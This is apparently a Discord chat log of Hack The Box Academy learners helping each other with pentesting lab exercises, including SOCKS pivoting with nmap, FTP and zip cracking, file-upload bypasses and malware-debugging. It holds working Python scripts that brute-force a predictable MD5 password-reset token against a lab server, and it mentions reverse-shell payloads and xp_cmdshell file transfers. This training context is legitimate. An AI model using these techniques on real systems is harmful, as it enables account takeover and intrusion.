I've tried several methods, like switching GET to HEAD, and using Burp functions to change GET requests to POST and then to HEAD, but nothing seems to work.

See if there is anything else you are missing by looking at the available HTTP verbs

My b, thought only the HEAD method would work for that

thanks mate

np

Hello. I am working on the module "Pivoting, Tunneling, and Port Forwarding" and I am at the section "Dynamic Port Forwarding with SSH and SOCKS Tunneling".
I tried to perform an nmap scan using dynamic port forwarding but it seems that nothing is routed to the target machine.
I started by enabling port forwarding using SSH:
$ssh -D 9050 ubuntu@10.129.202.64
Then, I checked that my proxychains configuration is correct:

socks4     127.0.0.1 9050```
Finally, I ran my nmap command through proxychains:
```$proxychains nmap -v -Pn -sT 172.16.5.19 
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 15:26 CEST
Initiating Parallel DNS resolution of 1 host. at 15:26
Completed Parallel DNS resolution of 1 host. at 15:26, 0.01s elapsed
Initiating Connect Scan at 15:26
Scanning 172.16.5.19 [1000 ports]
Connect Scan Timing: About 15.50% done; ETC: 15:29 (0:02:49 remaining)```
We can see that nothing is port forwarded.

This is surprising because it works well using xfreerdp:

[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain  ...  127.0.0.1:9050  ...  172.16.5.19:3389  ...  OK
[15:27:52:113] [5112:5114] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[15:27:52:113] [5112:5114] [WARN][com.freerdp.crypto] - CN = DC01.inlanefreight.local
[15:27:54:421] [5112:5114] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[15:27:54:421] [5112:5114] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[15:27:54:440] [5112:5114] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[15:27:54:440] [5112:5114] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx```
What is wrong with my nmap command?

i don't see where in your outputs it's not being routed?

nmap is showing that it's scanning

it takes slightly longer over a proxy due to it needing to route

-- Initiating Connect Scan
-- connect scan timing

Here is the full log:

[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 15:40 CEST
Initiating Parallel DNS resolution of 1 host. at 15:40
Completed Parallel DNS resolution of 1 host. at 15:40, 0.01s elapsed
Initiating Connect Scan at 15:40
Scanning 172.16.5.19 [1000 ports]
Connect Scan Timing: About 15.50% done; ETC: 15:43 (0:02:49 remaining)
Connect Scan Timing: About 30.50% done; ETC: 15:43 (0:02:19 remaining)
Connect Scan Timing: About 45.50% done; ETC: 15:43 (0:01:49 remaining)
Connect Scan Timing: About 60.50% done; ETC: 15:43 (0:01:19 remaining)
Connect Scan Timing: About 75.50% done; ETC: 15:43 (0:00:49 remaining)
Completed Connect Scan at 15:43, 201.36s elapsed (1000 total ports)
Nmap scan report for 172.16.5.19
Host is up.
All 1000 scanned ports on 172.16.5.19 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 201.47 seconds

There are no metion of [proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.5.19:3389 ... OK like we have using xfreerdp. Moreover, when I use wireshark to sniff the tun0 interface, I can see that nothing is sent to the target machine.

it's also just a case of nmap sometimes is dumb

try specifically scanning for 3389

The machine inside 172 maybe doesn't know how to route the traffic back to your attack host

That's not better:

[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 15:48 CEST
Initiating Parallel DNS resolution of 1 host. at 15:48
Completed Parallel DNS resolution of 1 host. at 15:48, 0.01s elapsed
Initiating Connect Scan at 15:48
Scanning 172.16.5.19 [1 port]
Completed Connect Scan at 15:48, 2.00s elapsed (1 total ports)
Nmap scan report for 172.16.5.19
Host is up.

PORT     STATE    SERVICE
3389/tcp filtered ms-wbt-server

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.13 seconds```

So why does it work with xfreerdp?

Moreover, as no packets are sent through tun0, I do not think this is a routing issue from the target network.

And is there a way to make it work with nmap? In the module, we can see that we get a respoonse from port 3389 in the nmap scan.

Sure, scan directly from the jump host since it has an interface on 172

Well, the module is about port forwarding... 🙂
Also, nmap is not installed on this machine.

also since it's showing as filtered it doesn't mean it's closed

nmap by default doesn't show filtered ports

maybe you can do something with socat but it gets messy, my advice is to scan directly from the jump host

The port is filtered because I got no response:

3389/tcp filtered ms-wbt-server no-response

It is normal because, given wireshark data, nothing is sent to the target. I would like to know why. In the module, the same command seems to work.

or use nmap's proxy option

I already tried and I got the same result.

as well

either way

you know RDP is open, don't get hung up on it

if you're on US servers that's likely why, it seems some labs have issues fully spawning internal networks

EU seems to be fine though

This module specifically has you run nmap from your host through proxychains

I'm looking at it now

I am using EU1.

The purpose of a module is to learn. 🙂

again

sometimes you'll run into things that just don't work exactly as shown

That is actually really strange. Are you sure you're still SSH'd to the linux host?

I'm getting the same

need help guys. I got stuck at "ATTACKING COMMON SERVICES - Attacking FTP" exercise

what have you tried, did you scan all ports?

It should work just fine with nmap, and your output suggests that it wasn't being handled by proxychains. However, I am unable to reproduce this - it works 100% fine on my side.

found 2121 port stuck at password guessing

did you try ||anonymous||

yes I tried but didn't worked

?

it should

you're still digging the 10.129.x.x inlanefreight.htb site

you're gonna find answers within those records

within the records you will find there

or one of the other subdomains you can dig to

got it

did you not specify port for ftp?

I did not tried without password

that's how that login works my guy

if you read the section it talks about anon login

yeah Thanks

are you digging to the subdomains with the @10.129.x.x?

weird

this is on Active Subdomain Enumeration in the Info Gathering Module yeah?

try more of the found subdomains

there's more than those

hint: you know where the txt record is yes?

look there

help me guys

stuck at the forever

i cant make john crack the pass of zip file

hashid file.hash

did you try with the mutated password list?

yes , didnt work
john does nothing , it says session completed after one second of execution

I wouldn't use john tbh and your mutated list needs to have 94k words

^

tried with frackzip

been meaning to throw an erratum for this module as the cheatsheet is missing the | sort -u

it should work with john/hashcat

Module:
Section:
Link of the module:
Description:

eh in future do that

but this is at least a niche enough question to know where it's from

link of module isn't necessary tbqh

module password attack
section Protected Archives
link : https://academy.hackthebox.com/module/147/section/1323

and double checked the official walkthrough:: the mutated wordlist should have the password

not the mutated kira list but the full- whole hog- mutated list that has 94k words

im just lazy to manually look it up XD

¯_(ツ)_/¯

when i dont supply wordlist it starts bruteforcing
when i supply the wordlist it stops bruteforcing

i just know it's in the mutated list

session complets in 00:00:00

it looks like you're only using the mutated Kira list

not the full mutated list created from the password.list and custom.rule

as stated earlier; that word list is ~94k words long

the tail end of the full mutated list should be Yellow99!

How to track ip address

got it

don't use --force when you're mutating a wordllist with hashcat btw

<@&861185840277487616>

For what purpose, tracking an IP doesn't necessarily go as far as you think

It can give you a general geographic location

https://tenor.com/view/excellent-ip-address-i-have-your-ip-address-gif-23894879

hey friends, i am at Skills Assessment - File Upload Attacks, trying to get the source code but i dont know whats wrong, i did a year ago and trring it again 😅

you sure the path is correct ?

idk how it will handle /contact/upload.php

oh yes my bad, i tried contact/upload.php too but the same happened

start with ../index.php first

same 😅

I need help in Q1 from Predictable Reset Token section from Broken Authentication academy module.
I understand what to do but am confused with the format.

Look up predictable reset token in this channel I belive @next bronze made a list of basic things to do

Hi I am doing ICMP Tunneling with SOCKS module of "PIVOTING, TUNNELING, AND PORT FORWARDING" module. And I have set up ptunnel server and connected to the server so that listener at port 2222 is started on my attackbox. However, when I try to establish SSH conection through ICMP tunnel, it is not reliable and doesn't suceed much. I keep on getting the error. Is this expected behavior? If not, what can I do to make it more reliable?

#modules message

did you try to decode the content and see what you got ?

it should be pinned

yes its the file i am trying to send

i know all these things.
but look like something is wrong in my solve.
can i DM you the solution?

my script should work but there is not hit.

i have read the source and know that last 3 digits are to be bruteforced which i did.

huh? no it's the whole md5 hash

generate a hash for every milisecond

i have computed md5 according to the open meeting source code snippet

i just got it for some reason it was the magic bytes that not making it work, thats so strange 😅

thank u so much

||GIF-8 ?||

I didn't help , but gg

time = re.findall(r'created at (\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\w{2})', data)[0]

utc_datetime = int(datetime.strptime(time, '%Y-%m-%d %I:%M:%S%p').timestamp())
utc_datetime *= 1000

hash(b'htbuser'+str(utc_datetime+i).encode())

here is the specific portion of my code which i am using to get the hash

no its|| ÿØÿà for jpg||

it should be in epoch time, and again you'll need to generate a hash for every milisecond, I'm not seeing the loop where you're doing that

weird you got this in your first request

read this again pls #modules message

no i mean it worked when i remove it, it was the reason for it to not work

aah mayeb it force the file to be jpg instead of svg so the webapp couldn't read the file

i think so, but i tried without it first and it didnt work for some reason 🤔

maybe the path was wrong

i think i am doing it correctly while keeping millseconds in mind.

any one done the Attacking Common Applications - Other Notable Applications questions? Outside of the metasploit module is there another way to do this?

I was using the same exploit as in this post
https://forum.hackthebox.com/t/attacking-common-applications-other-notable-applications/252457

i was trying to get the powershell invoke request to execute a custom msfvenom payload reverse shell. I tried multiple extnsions but nothing contacted my listener. any help?

aaah yes, u r right 😅 😂

you'll also need epoch time

100-1000 range? so you're also only sending 900 requests

bcz only only need last 3 digits for mill seconds thats why it is from 100-1000 cuz this range has all 3 digits numbers

that doesn't seem right, the requests need to be from the range of +/-1 seconds, so you'll need to cover a second before the start too

I'm not sure what kind of hash you're generating, and you're hashing the bytes of the string itself, idk if that will make it generate a different hash

I believe there's a sample given in the section, try to use that

Here is the complete code

from datetime import datetime
import requests
import hashlib
import re

ip = "http://94.237.49.212:43831"

hash = lambda x: hashlib.md5(x).hexdigest()

def get_token():
    data = {"submit":"htbuser"}
    req = requests.post(ip+'/question1/', data=data)
    return req.text

    
data = get_token()
token = re.findall(r'token is: ([a-f0-9]+)', data)[0]
time = re.findall(r'created at (\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\w{2})', data)[0]

utc_datetime = int(datetime.strptime(time, '%Y-%m-%d %I:%M:%S%p').timestamp())

for i in range(0,1000):
    calc_token = hash(b'htbuser'+(str(utc_datetime+i)).encode())
    print(str(utc_datetime)+str(i))
    # print(calc_token, token)
    if calc_token == token:
        print("Hit finally")
        exit()

utc_datetime = int(datetime.strptime(time, '%Y-%m-%d %I:%M:%S%p').timestamp())+1

for i in range(0,1000):
    calc_token = hash(b'htbuser'+(str(utc_datetime+i)).encode())
    print(str(utc_datetime)+str(i))
    # print(calc_token, token)
    if calc_token == token:
        print("Hit finally")
        exit()

utc_datetime = int(datetime.strptime(time, '%Y-%m-%d %I:%M:%S%p').timestamp())-1

for i in range(0,1000):
    calc_token = hash(b'htbuser'+(str(utc_datetime+i)).encode())
    print(str(utc_datetime)+str(i))
    # print(calc_token, token)
    if calc_token == token:
        print("Hit finally")
        exit()
        ```

i have also add +1/-1 still not hit.

INTRODUCTION TO MALWARE ANALYSIS - Debugging
guys i am having trouble i used my own vm downloaded inetsim and configured it accordingly, i updated the dns for the windows machine.
i did all the debugging
0x1 to 0x0
je to jne
jne to jmp
when i run nothing happens i have also browsed to my internet and can see that inetsim is configured properly.
Any help please

did you network the two vms?

what do you mean by that?

inetsim should be running on another vm, no?

yep

so you have to network the two vms so that they can communicate with each other

did you do that?

change the dns address in the windows machine?

no, i mean like in the hypervisor settings

they should be able to ping each other

from my windows ping to the target?

i guess not the windows machine but you should be able to ping the linux vm from your windows vm

oh i understand now i read it wrong

i thought you had two VMs

if you are doing it from your own vm, you are going to have some trouble

i think tried it on the instance provided also it had the same problem

i did it with the pwnbox but that was awful and not recommended

Vbox has documentation on its networking modes

if you can do it, i would try to setup your own airgapped network

does setting the breakpoint matter?

https://www.virtualbox.org/manual/ch06.html

if you updated the jump instructions accordingly, then it shouldn't matter

Setting a breakpoint tells the debug to stop after or at a certain instruction point

do you get the popup message saying that it sent to C2?

nope

then you may have missed a jmp instruction

theres only 3 right?

i can check my notes real quick

yeah there are only three

when i open shell.exe without anything i also didnt get any sandbox detected prompt

this is kind of difficult to debug since i'd have to do the exercise myself

i wonder if the message pops up after it sends the connection or before it sends the connection

what do you mean by that?

if the message pops up after it sends the connection, then it has to actually make the connection first. if it can't do that, then it can't send the message, thus no message box

which would mean that you may have something configured incorrectly

if it sends it before it actually makes the connection, then i'm not sure what the issue is

i would assume the former in this case

so can you show your DNS config real quick

i already closed it already im bout to go to bed im gonna reread it tmr

https://tenor.com/view/skeleton-drop-gif-1982649100088909979

the inetsim works when i went to the internet and search something it shows inetsim

so it cant possibly be with dns configuration issue

it may be a server issue too, idk

Did anyone else take 1.5 hrs to complete the Oracle TNS module? the odat.py was the slowest thing on earth

can i dm you my whole steps from start to finish tmr?

I'm not a code reviewer unfortunately, but here is the general loop I used

dt_now = datetime.strptime(timestamp, "%Y-%m-%d %I:%M:%S%p")
dt_utc = dt_now.replace(tzinfo=pytz.UTC)
current = int(dt_utc.timestamp() * 1000)
start = current - 1001
for i in range(start, current + 1001)
...
def check_token(i):
      input_str = f"htbadmin{i}"
    token = hashlib.md5(input_str.encode()).hexdigest()
    data = {"token": token, "submit": "check"}

    response = requests.post(url, data=data)

    if "Wrong token" not in response.text:
        match = re.search(flag_re, response.text)
        return token, match.group() if match else None, i
    return None, None, i

might not be here but you can ping me

i'd need my notes which i only have on my pc

mb read that wrongly

thanks, i will try it and let you know.

Thanks @next bronze. solved via your script.

weird. got the platinum member subscription and received the 1000 cubes but the amount of cube required for the module remains unchanged

the prices for the modules don't change

isn't there supposed to be a 36% discount?

for platinum ?

where does it say that?

Compared to buying the cubes outright

that's a 36% discount for buying cubes

Oooooo

Oooooo. so sorry for the mistake LOL

Compare the $68 To the price of outright buying cubes

yea, i made a mistake😅

can someone give the the total cost for cpts exam + student plan?
the cheapest route to get it

$218

if you can complete it in one month that is

but probably not so $210 + $24 (3 month student sub)

3 month that my goal before my next semester start

then you buy cpts voucher right?

yea $210 is the exam voucher

for a total of $234

thank you

https://europe1.discourse-cdn.com/hackthebox/original/3X/c/6/c6988c964934f9259ee9db4ea9dbb8f6c0c64b9e.png

In the Thick Client portion of the Attacking Common App module I keep getting this error across multiple resets. If anyone is familiar with it, please point me in the right direction.

P.S I cant paste my screenshot in this chat so hopefully the above link is sufficient

Read and follow #welcome to be able to screenshot

Thank you @fathom pendant I hope you guys can see it now

access denied
Your user isn't admin/system to be able to perform the task

The credentials HTB gives me for the exercise allows me to run tools as an administrator. Is that different from the permissions your implying? I can access PowerShell for example as system

Hey

I'm having problems accessing the target machine, ping and nmap get no response (I'm using pwnbox), thank you if anyone can help me

Click the "change" button with the UAC shield next to it

What academy module is this in relation to

I'm at HTB Labs

I'm new and I can't send messages on other discord channels

Read and follow #welcome to access more channel like #starting-point (starting point) and #boxes (boxes)

Ok

im working in footprinting on pentester path... am I going crazy with smtp-user-enum command... this should work right?! i even try it with -p and still throws the same error (even though its not needed bc -p 25 by default)

Anyone else have issues with the "Permissive File System ACLs" section of the Windows Privesc module?

I am trying to run the
sc start SecurityService
but I am not getting the reverse shell

went and checked the walkthrough and I did everything exactly how the walkthrough showed

increase the timeout

it's either w or W i genuinely forget

also -t is the port

not the target

wait

it's just being dumb ig

bc that looks like it should be valid syntax

module and section?

just spun up my own pwnbox, works fine for me

also use the footprinting wordlist from resources

it could just be that the Userlist doesn't exist and it's being dumb

it's -w btw

you can also adjust worker processes with -m

default is 5

Good evening house pls still on kerberoasting section of windows Attack & defense I have solved the number 1 task that has to do with password of svc-iam user the event side it’s where I ma I have successfully logged to the stipulated ip_add my issue it’s that I search event 4769 and try to find svc-iam but the only results I got the sid I got it’s incorrect any hint on where I got it wrong ?

Here’s it’s the question {After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user?} so it’s referring to web service user Sid and the just concluded attack was on svc-iam user

Got a quick one I could use a nudge on deducive reasoning: Using xp_cmdshell to file transfer executes the command get request via powershell, doesnt transfer the data, but crates the empty file. I have a decent idea, but want to gain validity if using http is not the way vs smb in terms of theory

many ways to crack an egg ed boi

certutil is often better for this purpose than xp_cmdshell powershell -c "wget" blah blah

The fact you used an ed edd and eddy reference grants you many rep points. GG

So funny thing is Ive attenpted certutil, and Im sure the syntax is incorrect but it does execute. Wget, etc seems to take quite a bit to hang or timeout--or do magical fairy things I'm not aware of Lol

Hmm...

If certutil works via the specified port for the ft server, but no data is transferred, then Im either stuck on reverse proxy to an internal host or the protocol should be smb to perform the ft (using native tools). I'm not satisfied with this, but it might be the technical solution

I'm open to more input, as I'm perplexed why data failed transfer but created the file

Thanks Marcie!

👍

just refer back to the file transfers module if something ever goes oopsie in a file transfer

You might generally fall into a habit of one, but doesn't hurt to know others

This is tru
Great! Appreciate this a lot!

Speaking of I need to re-set up my attacker nginx that had all my cool tools to transfer

i even had an apache default html for the luls

??

it doesn't look like expected behavior

have you tried changing vpn regions and performing the same steps

can you complete it using a different technique

sanity check: if i have a ssh pub key, i should be able to change the perms of the pubkey and be able to send it to ssh with -i flag... (given all the other info is correct) correct?

something is amiss in my brain

yeah

as long as they keys were also added on the remote server

well, this instance, i just stole the keys from a port open but im not able to overwrite the authkeys or put in my own id_rsa, so im just trying to force ssh to use their own users ssh pubkey to access

yeah most likely it's already there if you got it from the same box

well

or another box on the network

you wouldn't use their pubkey to access

you'd use their priv key

aka the id_rsa file

(or you'd add your public key to the authorized users file)

there is a lightbulb in my brain now

but I guess the reason is, why? wouldnt the server have their own priv key, so I would use what's typically publicly available to me? why would I send the server the priv key?

because its YOUR private key

for that specific user

^

generally you don't put your private key out on the open internet

doing so would be bad for you

you wouldn't want to share your private key because then someone could auth as you

your private key says "I am this person" and the server agrees, because who else would have your private key right?

whenever something is sent over SSL to you, it's encrypted using your public key, and decrypted on your end with your private key

ah, okay this all makes sense. My thought process here was the server has the privkey of said user, so let me send the pubkey of said user to it so it can validate it, but if EVERYONE has the pubkey it doesnt make sense for the server to give me access as that user because it doesnt actually authenticate me

it's why; in ANY text regarding the pub/private pair, you're ALWAYS urged to never give your private key

exactly; what the private key authentication does is it compares it to the public key (or authorized keys) file for what would give it a proper sum value (As this specifically is based on the RSA algorithm, which is just 2 REALLY big prime numbers

there's some other stuff that goes into creating it

but at the core of it is REALLY big numbers

the product of 2 primes which makes it hard to actually decode (at least for current computing standards)

https://en.wikipedia.org/wiki/RSA_(cryptosystem)

so sorry to beat this topic, so if sending my privkey is part of the authentication process, is sending a pubkey just for "authorization"? Like why would I send my pubkey or what instances would that be?

crypto was my most devasting course in my studies LOL this explains why I'm asking so many questions

hi, sorry to post here but I can't find the appropriate channel to ask.

I'm unable to login to htb academy after they migrate to single sign on. anybody facing the same issue?

reach out to support

my email is only registered with htb academy and not htb account.

they're the only ones that can help you

I've dropped them an email at customerops@hackthebox.com but still not getting any response.

well then be patient

this channel is in regards to academy modules

not general support, support agents do not monitor this chat

nor the discord in general

it is also the weekend, so it may also increase a time of response

I see.

np; the other part of RSA is message signing, but in this case you're not signing anything (Aside from maybe your connection packet, but that's a whole other can of worms that i'm not qualified to discuss lmao)

whats the earliest date you can see in the logs, after filtering for event 4769?

they figured it out; they reset and re-ran the attack

#cdsa was where we resolved

ah gotcha

thank you 🙂

np

i sanity checked the guide for them

so that way they weren't going crazy

i wonder if i binged the CDSA path how fast i could complete it 🤔

some of the modules require a ton of reading

i mean i've sanity checked a bunch of people on the reading portions before

any academy admin?

for?

i just notice something wrong in a nmap section in the academy

well if it's an error you feel needs correction

there's #1234357888114364508

no it's just a mistike from who write the command

Module Name - Section
Type of correction -- (screenshots as applicable)
Tag (in this case typo)

even if it's a small mistake it's still something you can throw at #1234357888114364508

as staff that work on academy content will see it

and adjust as needed

¯_(ツ)_/¯

yeah i will be happy if i give them some little help

it seems important if you need a staff to see it right away

but staff sometimes sleep

no it's not that import

#1234357888114364508 is a place for the correction to not get drowned out either

well it was important enough to come ask for someone